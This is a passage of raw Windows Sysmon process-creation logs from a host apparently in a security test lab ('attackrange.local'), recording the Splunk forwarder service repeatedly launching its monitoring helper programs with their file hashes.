Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034776Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:26:17.123{A8622C2F-4D09-6078-AF06-00000000AE01}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034601Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:25:22.820{A8622C2F-4CD2-6078-AE06-00000000AE01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034589Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:25:21.735{A8622C2F-4CD1-6078-AD06-00000000AE01}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034579Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:25:21.066{A8622C2F-4CD1-6078-AC06-00000000AE01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034569Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:25:20.393{A8622C2F-4CD0-6078-AB06-00000000AE01}7100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034558Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:25:18.412{A8622C2F-4CCE-6078-AA06-00000000AE01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034548Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:25:17.744{A8622C2F-4CCD-6078-A906-00000000AE01}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034539Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:25:17.111{A8622C2F-4CCD-6078-A806-00000000AE01}5716C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034463Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:24:22.806{A8622C2F-4C96-6078-A706-00000000AE01}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034448Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:24:21.735{A8622C2F-4C95-6078-A606-00000000AE01}6400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034438Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:24:21.069{A8622C2F-4C95-6078-A506-00000000AE01}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034429Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:24:20.397{A8622C2F-4C94-6078-A406-00000000AE01}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034418Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:24:18.396{A8622C2F-4C92-6078-A306-00000000AE01}6600C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034407Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:24:17.729{A8622C2F-4C91-6078-A206-00000000AE01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034398Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:24:17.124{A8622C2F-4C91-6078-A106-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034266Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:22.805{A8622C2F-4C5A-6078-A006-00000000AE01}6220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034251Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:21.747{A8622C2F-4C59-6078-9F06-00000000AE01}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034239Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:21.084{A8622C2F-4C59-6078-9E06-00000000AE01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034229Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:20.402{A8622C2F-4C58-6078-9D06-00000000AE01}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034208Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:18.396{A8622C2F-4C56-6078-9C06-00000000AE01}2196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034199Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:17.730{A8622C2F-4C55-6078-9B06-00000000AE01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034189Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:17.110{A8622C2F-4C55-6078-9A06-00000000AE01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034102Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:22:22.784{A8622C2F-4C1E-6078-9906-00000000AE01}3736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034088Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:22:21.730{A8622C2F-4C1D-6078-9806-00000000AE01}6696C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034078Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:22:21.058{A8622C2F-4C1D-6078-9706-00000000AE01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034062Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:22:20.389{A8622C2F-4C1C-6078-9606-00000000AE01}6368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034051Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:22:18.379{A8622C2F-4C1A-6078-9506-00000000AE01}3648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034042Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:22:17.699{A8622C2F-4C19-6078-9406-00000000AE01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034033Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:22:17.097{A8622C2F-4C19-6078-9306-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033916Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:21:22.920{A8622C2F-4BE2-6078-9206-00000000AE01}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033901Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:21:21.735{A8622C2F-4BE1-6078-9106-00000000AE01}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033891Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:21:21.066{A8622C2F-4BE1-6078-9006-00000000AE01}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033881Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:21:20.388{A8622C2F-4BE0-6078-8F06-00000000AE01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 